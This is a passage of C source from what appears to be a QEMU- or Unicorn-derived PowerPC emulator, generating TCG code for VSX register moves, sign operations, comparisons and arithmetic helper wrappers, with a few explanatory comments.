POWERPC_EXCP_VPU); return; } } TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); TCGv_i64 xsh = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xsh, xS(ctx->opcode)); tcg_gen_ext32u_i64(tcg_ctx, tmp, xsh); tcg_gen_trunc_i64_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], tmp); tcg_temp_free_i64(tcg_ctx, tmp); tcg_temp_free_i64(tcg_ctx, xsh); } static void gen_mtvsrwa(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (xS(ctx->opcode) < 32) { if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } } else { if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } } TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); TCGv_i64 xsh = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_tl_i64(tcg_ctx, tmp, cpu_gpr[rA(ctx->opcode)]); tcg_gen_ext32s_i64(tcg_ctx, xsh, tmp); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xsh); tcg_temp_free_i64(tcg_ctx, tmp); tcg_temp_free_i64(tcg_ctx, xsh); } static void gen_mtvsrwz(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (xS(ctx->opcode) < 32) { if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } } else { if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } } TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); TCGv_i64 xsh = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_tl_i64(tcg_ctx, tmp, cpu_gpr[rA(ctx->opcode)]); tcg_gen_ext32u_i64(tcg_ctx, xsh, tmp); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xsh); tcg_temp_free_i64(tcg_ctx, tmp); tcg_temp_free_i64(tcg_ctx, xsh); } 
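/*
 * Editor's sketch, not part of the original file: gen_mtvsrwa and
 * gen_mtvsrwz above differ only in how the low 32 bits of the GPR are
 * widened before landing in the high doubleword of the target VSR.
 * A plain C model of the two widenings (the model_* names are
 * hypothetical, for illustration only):
 *
 *   static uint64_t model_mtvsrwa(uint32_t w)  // sign-extend, cf. tcg_gen_ext32s_i64
 *   {
 *       return (uint64_t)(int64_t)(int32_t)w;
 *   }
 *   static uint64_t model_mtvsrwz(uint32_t w)  // zero-extend, cf. tcg_gen_ext32u_i64
 *   {
 *       return (uint64_t)w;
 *   }
 */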
#if defined(TARGET_PPC64) static void gen_mfvsrd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0; if (xS(ctx->opcode) < 32) { if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } } else { if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } } t0 = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, t0, xS(ctx->opcode)); tcg_gen_mov_i64(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0); tcg_temp_free_i64(tcg_ctx, t0); } static void gen_mtvsrd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0; if (xS(ctx->opcode) < 32) { if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } } else { if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } } t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_mov_i64(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), t0); tcg_temp_free_i64(tcg_ctx, t0); } static void gen_mfvsrld(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0; if (xS(ctx->opcode) < 32) { if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } } else { if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } } t0 = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrl(tcg_ctx, t0, xS(ctx->opcode)); tcg_gen_mov_i64(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0); tcg_temp_free_i64(tcg_ctx, t0); } static void gen_mtvsrdd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0; if (xT(ctx->opcode) < 32) { if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } } else { if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } } t0 = tcg_temp_new_i64(tcg_ctx); if (!rA(ctx->opcode)) { tcg_gen_movi_i64(tcg_ctx, t0, 0); } else { tcg_gen_mov_i64(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); } set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), t0); tcg_gen_mov_i64(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)]); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), t0); tcg_temp_free_i64(tcg_ctx, t0); } static void gen_mtvsrws(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0; if (xT(ctx->opcode) < 32) { if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } } else { if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } } t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_deposit_i64(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], 32, 32); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), t0); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), t0); tcg_temp_free_i64(tcg_ctx, t0); } #endif static void gen_xxpermdi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xh, xl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xh = tcg_temp_new_i64(tcg_ctx); xl = tcg_temp_new_i64(tcg_ctx); if (unlikely((xT(ctx->opcode) == xA(ctx->opcode)) || (xT(ctx->opcode) == xB(ctx->opcode)))) { if ((DM(ctx->opcode) & 2) == 0) { get_cpu_vsrh(tcg_ctx, xh, xA(ctx->opcode)); } else { get_cpu_vsrl(tcg_ctx, xh, xA(ctx->opcode)); } if ((DM(ctx->opcode) & 1) == 0) { get_cpu_vsrh(tcg_ctx, xl, xB(ctx->opcode)); } else { get_cpu_vsrl(tcg_ctx, xl, xB(ctx->opcode)); } set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xh); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xl); } else { if ((DM(ctx->opcode) & 2) == 0) { get_cpu_vsrh(tcg_ctx, xh, xA(ctx->opcode)); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xh); } else { get_cpu_vsrl(tcg_ctx, xh, xA(ctx->opcode)); set_cpu_vsrh(tcg_ctx, 
xT(ctx->opcode), xh); } if ((DM(ctx->opcode) & 1) == 0) { get_cpu_vsrh(tcg_ctx, xl, xB(ctx->opcode)); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xl); } else { get_cpu_vsrl(tcg_ctx, xl, xB(ctx->opcode)); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xl); } } tcg_temp_free_i64(tcg_ctx, xh); tcg_temp_free_i64(tcg_ctx, xl); } #define OP_ABS 1 #define OP_NABS 2 #define OP_NEG 3 #define OP_CPSGN 4 #define SGN_MASK_DP 0x8000000000000000ull #define SGN_MASK_SP 0x8000000080000000ull #define VSX_SCALAR_MOVE(name, op, sgn_mask) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 xb, sgm; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ xb = tcg_temp_new_i64(tcg_ctx); \ sgm = tcg_temp_new_i64(tcg_ctx); \ get_cpu_vsrh(tcg_ctx, xb, xB(ctx->opcode)); \ tcg_gen_movi_i64(tcg_ctx, sgm, sgn_mask); \ switch (op) { \ case OP_ABS: { \ tcg_gen_andc_i64(tcg_ctx, xb, xb, sgm); \ break; \ } \ case OP_NABS: { \ tcg_gen_or_i64(tcg_ctx, xb, xb, sgm); \ break; \ } \ case OP_NEG: { \ tcg_gen_xor_i64(tcg_ctx, xb, xb, sgm); \ break; \ } \ case OP_CPSGN: { \ TCGv_i64 xa = tcg_temp_new_i64(tcg_ctx); \ get_cpu_vsrh(tcg_ctx, xa, xA(ctx->opcode)); \ tcg_gen_and_i64(tcg_ctx, xa, xa, sgm); \ tcg_gen_andc_i64(tcg_ctx, xb, xb, sgm); \ tcg_gen_or_i64(tcg_ctx, xb, xb, xa); \ tcg_temp_free_i64(tcg_ctx, xa); \ break; \ } \ } \ set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xb); \ tcg_temp_free_i64(tcg_ctx, xb); \ tcg_temp_free_i64(tcg_ctx, sgm); \ } VSX_SCALAR_MOVE(xsabsdp, OP_ABS, SGN_MASK_DP) VSX_SCALAR_MOVE(xsnabsdp, OP_NABS, SGN_MASK_DP) VSX_SCALAR_MOVE(xsnegdp, OP_NEG, SGN_MASK_DP) VSX_SCALAR_MOVE(xscpsgndp, OP_CPSGN, SGN_MASK_DP) #define VSX_SCALAR_MOVE_QP(name, op, sgn_mask) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ int xa; \ int xt = rD(ctx->opcode) + 32; \ int xb = rB(ctx->opcode) + 32; \ TCGv_i64 xah, xbh, xbl, sgm, tmp; \ \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ xbh = tcg_temp_new_i64(tcg_ctx); \ xbl = tcg_temp_new_i64(tcg_ctx); \ sgm = tcg_temp_new_i64(tcg_ctx); \ tmp = tcg_temp_new_i64(tcg_ctx); \ get_cpu_vsrh(tcg_ctx, xbh, xb); \ get_cpu_vsrl(tcg_ctx, xbl, xb); \ tcg_gen_movi_i64(tcg_ctx, sgm, sgn_mask); \ switch (op) { \ case OP_ABS: \ tcg_gen_andc_i64(tcg_ctx, xbh, xbh, sgm); \ break; \ case OP_NABS: \ tcg_gen_or_i64(tcg_ctx, xbh, xbh, sgm); \ break; \ case OP_NEG: \ tcg_gen_xor_i64(tcg_ctx, xbh, xbh, sgm); \ break; \ case OP_CPSGN: \ xah = tcg_temp_new_i64(tcg_ctx); \ xa = rA(ctx->opcode) + 32; \ get_cpu_vsrh(tcg_ctx, tmp, xa); \ tcg_gen_and_i64(tcg_ctx, xah, tmp, sgm); \ tcg_gen_andc_i64(tcg_ctx, xbh, xbh, sgm); \ tcg_gen_or_i64(tcg_ctx, xbh, xbh, xah); \ tcg_temp_free_i64(tcg_ctx, xah); \ break; \ } \ set_cpu_vsrh(tcg_ctx, xt, xbh); \ set_cpu_vsrl(tcg_ctx, xt, xbl); \ tcg_temp_free_i64(tcg_ctx, xbl); \ tcg_temp_free_i64(tcg_ctx, xbh); \ tcg_temp_free_i64(tcg_ctx, sgm); \ tcg_temp_free_i64(tcg_ctx, tmp); \ } VSX_SCALAR_MOVE_QP(xsabsqp, OP_ABS, SGN_MASK_DP) VSX_SCALAR_MOVE_QP(xsnabsqp, OP_NABS, SGN_MASK_DP) VSX_SCALAR_MOVE_QP(xsnegqp, OP_NEG, SGN_MASK_DP) VSX_SCALAR_MOVE_QP(xscpsgnqp, OP_CPSGN, SGN_MASK_DP) #define VSX_VECTOR_MOVE(name, op, sgn_mask) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 xbh, xbl, sgm; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ xbh = tcg_temp_new_i64(tcg_ctx); \ xbl = tcg_temp_new_i64(tcg_ctx); \ 
sgm = tcg_temp_new_i64(tcg_ctx); \ get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); \ get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); \ tcg_gen_movi_i64(tcg_ctx, sgm, sgn_mask); \ switch (op) { \ case OP_ABS: { \ tcg_gen_andc_i64(tcg_ctx, xbh, xbh, sgm); \ tcg_gen_andc_i64(tcg_ctx, xbl, xbl, sgm); \ break; \ } \ case OP_NABS: { \ tcg_gen_or_i64(tcg_ctx, xbh, xbh, sgm); \ tcg_gen_or_i64(tcg_ctx, xbl, xbl, sgm); \ break; \ } \ case OP_NEG: { \ tcg_gen_xor_i64(tcg_ctx, xbh, xbh, sgm); \ tcg_gen_xor_i64(tcg_ctx, xbl, xbl, sgm); \ break; \ } \ case OP_CPSGN: { \ TCGv_i64 xah = tcg_temp_new_i64(tcg_ctx); \ TCGv_i64 xal = tcg_temp_new_i64(tcg_ctx); \ get_cpu_vsrh(tcg_ctx, xah, xA(ctx->opcode)); \ get_cpu_vsrl(tcg_ctx, xal, xA(ctx->opcode)); \ tcg_gen_and_i64(tcg_ctx, xah, xah, sgm); \ tcg_gen_and_i64(tcg_ctx, xal, xal, sgm); \ tcg_gen_andc_i64(tcg_ctx, xbh, xbh, sgm); \ tcg_gen_andc_i64(tcg_ctx, xbl, xbl, sgm); \ tcg_gen_or_i64(tcg_ctx, xbh, xbh, xah); \ tcg_gen_or_i64(tcg_ctx, xbl, xbl, xal); \ tcg_temp_free_i64(tcg_ctx, xah); \ tcg_temp_free_i64(tcg_ctx, xal); \ break; \ } \ } \ set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xbh); \ set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xbl); \ tcg_temp_free_i64(tcg_ctx, xbh); \ tcg_temp_free_i64(tcg_ctx, xbl); \ tcg_temp_free_i64(tcg_ctx, sgm); \ } VSX_VECTOR_MOVE(xvabsdp, OP_ABS, SGN_MASK_DP) VSX_VECTOR_MOVE(xvnabsdp, OP_NABS, SGN_MASK_DP) VSX_VECTOR_MOVE(xvnegdp, OP_NEG, SGN_MASK_DP) VSX_VECTOR_MOVE(xvcpsgndp, OP_CPSGN, SGN_MASK_DP) VSX_VECTOR_MOVE(xvabssp, OP_ABS, SGN_MASK_SP) VSX_VECTOR_MOVE(xvnabssp, OP_NABS, SGN_MASK_SP) VSX_VECTOR_MOVE(xvnegsp, OP_NEG, SGN_MASK_SP) VSX_VECTOR_MOVE(xvcpsgnsp, OP_CPSGN, SGN_MASK_SP) #define VSX_CMP(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 ignored; \ TCGv_ptr xt, xa, xb; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ xt = gen_vsr_ptr(tcg_ctx, xT(ctx->opcode)); \ xa = gen_vsr_ptr(tcg_ctx, xA(ctx->opcode)); \ xb = gen_vsr_ptr(tcg_ctx, xB(ctx->opcode)); \ if ((ctx->opcode >> (31 - 21)) & 1) { \ gen_helper_##name(tcg_ctx, cpu_crf[6], tcg_ctx->cpu_env, xt, xa, xb); \ } else { \ ignored = tcg_temp_new_i32(tcg_ctx); \ gen_helper_##name(tcg_ctx, ignored, tcg_ctx->cpu_env, xt, xa, xb); \ tcg_temp_free_i32(tcg_ctx, ignored); \ } \ gen_helper_float_check_status(tcg_ctx, tcg_ctx->cpu_env); \ tcg_temp_free_ptr(tcg_ctx, xt); \ tcg_temp_free_ptr(tcg_ctx, xa); \ tcg_temp_free_ptr(tcg_ctx, xb); \ } VSX_CMP(xvcmpeqdp, 0x0C, 0x0C, 0, PPC2_VSX) VSX_CMP(xvcmpgedp, 0x0C, 0x0E, 0, PPC2_VSX) VSX_CMP(xvcmpgtdp, 0x0C, 0x0D, 0, PPC2_VSX) VSX_CMP(xvcmpnedp, 0x0C, 0x0F, 0, PPC2_ISA300) VSX_CMP(xvcmpeqsp, 0x0C, 0x08, 0, PPC2_VSX) VSX_CMP(xvcmpgesp, 0x0C, 0x0A, 0, PPC2_VSX) VSX_CMP(xvcmpgtsp, 0x0C, 0x09, 0, PPC2_VSX) VSX_CMP(xvcmpnesp, 0x0C, 0x0B, 0, PPC2_VSX) static void gen_xscvqpdp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 opc; TCGv_ptr xt, xb; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } opc = tcg_const_i32(tcg_ctx, ctx->opcode); xt = gen_vsr_ptr(tcg_ctx, xT(ctx->opcode)); xb = gen_vsr_ptr(tcg_ctx, xB(ctx->opcode)); gen_helper_xscvqpdp(tcg_ctx, tcg_ctx->cpu_env, opc, xt, xb); tcg_temp_free_i32(tcg_ctx, opc); tcg_temp_free_ptr(tcg_ctx, xt); tcg_temp_free_ptr(tcg_ctx, xb); } #define GEN_VSX_HELPER_2(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 opc; \ if (unlikely(!ctx->vsx_enabled)) 
{ \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ opc = tcg_const_i32(tcg_ctx, ctx->opcode); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, opc); \ tcg_temp_free_i32(tcg_ctx, opc); \ } #define GEN_VSX_HELPER_X3(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr xt, xa, xb; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ xt = gen_vsr_ptr(tcg_ctx, xT(ctx->opcode)); \ xa = gen_vsr_ptr(tcg_ctx, xA(ctx->opcode)); \ xb = gen_vsr_ptr(tcg_ctx, xB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, xt, xa, xb); \ tcg_temp_free_ptr(tcg_ctx, xt); \ tcg_temp_free_ptr(tcg_ctx, xa); \ tcg_temp_free_ptr(tcg_ctx, xb); \ } #define GEN_VSX_HELPER_X2(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr xt, xb; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ xt = gen_vsr_ptr(tcg_ctx, xT(ctx->opcode)); \ xb = gen_vsr_ptr(tcg_ctx, xB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, xt, xb); \ tcg_temp_free_ptr(tcg_ctx, xt); \ tcg_temp_free_ptr(tcg_ctx, xb); \ } #define GEN_VSX_HELPER_X2_AB(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 opc; \ TCGv_ptr xa, xb; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ opc = tcg_const_i32(tcg_ctx, ctx->opcode); \ xa = gen_vsr_ptr(tcg_ctx, xA(ctx->opcode)); \ xb = gen_vsr_ptr(tcg_ctx, xB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, opc, xa, xb); \ tcg_temp_free_i32(tcg_ctx, opc); \ tcg_temp_free_ptr(tcg_ctx, xa); \ tcg_temp_free_ptr(tcg_ctx, xb); \ } #define GEN_VSX_HELPER_X1(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 opc; \ TCGv_ptr xb; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ opc = tcg_const_i32(tcg_ctx, ctx->opcode); \ xb = gen_vsr_ptr(tcg_ctx, xB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, opc, xb); \ tcg_temp_free_i32(tcg_ctx, opc); \ tcg_temp_free_ptr(tcg_ctx, xb); \ } #define GEN_VSX_HELPER_R3(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 opc; \ TCGv_ptr xt, xa, xb; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ opc = tcg_const_i32(tcg_ctx, ctx->opcode); \ xt = gen_vsr_ptr(tcg_ctx, rD(ctx->opcode) + 32); \ xa = gen_vsr_ptr(tcg_ctx, rA(ctx->opcode) + 32); \ xb = gen_vsr_ptr(tcg_ctx, rB(ctx->opcode) + 32); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, opc, xt, xa, xb); \ tcg_temp_free_i32(tcg_ctx, opc); \ tcg_temp_free_ptr(tcg_ctx, xt); \ tcg_temp_free_ptr(tcg_ctx, xa); \ tcg_temp_free_ptr(tcg_ctx, xb); \ } #define GEN_VSX_HELPER_R2(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 opc; \ TCGv_ptr xt, xb; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ opc = tcg_const_i32(tcg_ctx, ctx->opcode); \ xt = gen_vsr_ptr(tcg_ctx, rD(ctx->opcode) + 32); \ xb = gen_vsr_ptr(tcg_ctx, rB(ctx->opcode) + 32); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, opc, xt, xb); \ tcg_temp_free_i32(tcg_ctx, opc); \ tcg_temp_free_ptr(tcg_ctx, xt); \ 
tcg_temp_free_ptr(tcg_ctx, xb); \ } #define GEN_VSX_HELPER_R2_AB(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 opc; \ TCGv_ptr xa, xb; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ opc = tcg_const_i32(tcg_ctx, ctx->opcode); \ xa = gen_vsr_ptr(tcg_ctx, rA(ctx->opcode) + 32); \ xb = gen_vsr_ptr(tcg_ctx, rB(ctx->opcode) + 32); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, opc, xa, xb); \ tcg_temp_free_i32(tcg_ctx, opc); \ tcg_temp_free_ptr(tcg_ctx, xa); \ tcg_temp_free_ptr(tcg_ctx, xb); \ } #define GEN_VSX_HELPER_XT_XB_ENV(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; \ TCGv_i64 t1; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ get_cpu_vsrh(tcg_ctx, t0, xB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, t1, tcg_ctx->cpu_env, t0); \ set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), t1); \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ } GEN_VSX_HELPER_X3(xsadddp, 0x00, 0x04, 0, PPC2_VSX) GEN_VSX_HELPER_R3(xsaddqp, 0x04, 0x00, 0, PPC2_ISA300) GEN_VSX_HELPER_X3(xssubdp, 0x00, 0x05, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xsmuldp, 0x00, 0x06, 0, PPC2_VSX) GEN_VSX_HELPER_R3(xsmulqp, 0x04, 0x01, 0, PPC2_ISA300) GEN_VSX_HELPER_X3(xsdivdp, 0x00, 0x07, 0, PPC2_VSX) GEN_VSX_HELPER_R3(xsdivqp, 0x04, 0x11, 0, PPC2_ISA300) GEN_VSX_HELPER_X2(xsredp, 0x14, 0x05, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xssqrtdp, 0x16, 0x04, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xsrsqrtedp, 0x14, 0x04, 0, PPC2_VSX) GEN_VSX_HELPER_X2_AB(xstdivdp, 0x14, 0x07, 0, PPC2_VSX) GEN_VSX_HELPER_X1(xstsqrtdp, 0x14, 0x06, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xscmpeqdp, 0x0C, 0x00, 0, PPC2_ISA300) GEN_VSX_HELPER_X3(xscmpgtdp, 0x0C, 0x01, 0, PPC2_ISA300) GEN_VSX_HELPER_X3(xscmpgedp, 0x0C, 0x02, 0, PPC2_ISA300) GEN_VSX_HELPER_X3(xscmpnedp, 0x0C, 0x03, 0, PPC2_ISA300) GEN_VSX_HELPER_X2_AB(xscmpexpdp, 0x0C, 0x07, 0, PPC2_ISA300) GEN_VSX_HELPER_R2_AB(xscmpexpqp, 0x04, 0x05, 0, PPC2_ISA300) GEN_VSX_HELPER_X2_AB(xscmpodp, 0x0C, 0x05, 0, PPC2_VSX) GEN_VSX_HELPER_X2_AB(xscmpudp, 0x0C, 0x04, 0, PPC2_VSX) GEN_VSX_HELPER_R2_AB(xscmpoqp, 0x04, 0x04, 0, PPC2_VSX) GEN_VSX_HELPER_R2_AB(xscmpuqp, 0x04, 0x14, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xsmaxdp, 0x00, 0x14, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xsmindp, 0x00, 0x15, 0, PPC2_VSX) GEN_VSX_HELPER_R3(xsmaxcdp, 0x00, 0x10, 0, PPC2_ISA300) GEN_VSX_HELPER_R3(xsmincdp, 0x00, 0x11, 0, PPC2_ISA300) GEN_VSX_HELPER_R3(xsmaxjdp, 0x00, 0x12, 0, PPC2_ISA300) GEN_VSX_HELPER_R3(xsminjdp, 0x00, 0x12, 0, PPC2_ISA300) GEN_VSX_HELPER_X2(xscvdphp, 0x16, 0x15, 0x11, PPC2_ISA300) GEN_VSX_HELPER_X2(xscvdpsp, 0x12, 0x10, 0, PPC2_VSX) GEN_VSX_HELPER_R2(xscvdpqp, 0x04, 0x1A, 0x16, PPC2_ISA300) GEN_VSX_HELPER_XT_XB_ENV(xscvdpspn, 0x16, 0x10, 0, PPC2_VSX207) GEN_VSX_HELPER_R2(xscvqpsdz, 0x04, 0x1A, 0x19, PPC2_ISA300) GEN_VSX_HELPER_R2(xscvqpswz, 0x04, 0x1A, 0x09, PPC2_ISA300) GEN_VSX_HELPER_R2(xscvqpudz, 0x04, 0x1A, 0x11, PPC2_ISA300) GEN_VSX_HELPER_R2(xscvqpuwz, 0x04, 0x1A, 0x01, PPC2_ISA300) GEN_VSX_HELPER_X2(xscvhpdp, 0x16, 0x15, 0x10, PPC2_ISA300) GEN_VSX_HELPER_R2(xscvsdqp, 0x04, 0x1A, 0x0A, PPC2_ISA300) GEN_VSX_HELPER_X2(xscvspdp, 0x12, 0x14, 0, PPC2_VSX) GEN_VSX_HELPER_XT_XB_ENV(xscvspdpn, 0x16, 0x14, 0, PPC2_VSX207) GEN_VSX_HELPER_X2(xscvdpsxds, 0x10, 0x15, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xscvdpsxws, 0x10, 0x05, 0, PPC2_VSX) 
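/*
 * Editor's note (hedged annotation, not part of the upstream build):
 * the GEN_VSX_HELPER_* generators above all expand to small translator
 * stubs that check ctx->vsx_enabled and then bounce into a C helper.
 * The suffix names the operand shape -- X3: xt/xa/xb register
 * pointers; X2: xt/xb; X2_AB and X1: source pointers plus the raw
 * opcode, for helpers that set CR/FPSCR themselves; R3/R2/R2_AB:
 * quad-precision forms addressing VSRs 32..63 via rD/rA/rB + 32;
 * plain "2": opcode only.  Hand-expanding the X2 instantiation of
 * xssqrtdp above yields approximately:
 *
 *   static void gen_xssqrtdp(DisasContext *ctx)
 *   {
 *       TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
 *       TCGv_ptr xt, xb;
 *       if (unlikely(!ctx->vsx_enabled)) {
 *           gen_exception(ctx, POWERPC_EXCP_VSXU);
 *           return;
 *       }
 *       xt = gen_vsr_ptr(tcg_ctx, xT(ctx->opcode));
 *       xb = gen_vsr_ptr(tcg_ctx, xB(ctx->opcode));
 *       gen_helper_xssqrtdp(tcg_ctx, tcg_ctx->cpu_env, xt, xb);
 *       tcg_temp_free_ptr(tcg_ctx, xt);
 *       tcg_temp_free_ptr(tcg_ctx, xb);
 *   }
 *
 * The op1/op2/inval/type arguments are unused by the macro bodies;
 * they appear to mirror the decode-table coordinates registered in
 * vsx-ops.inc.c below.
 */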
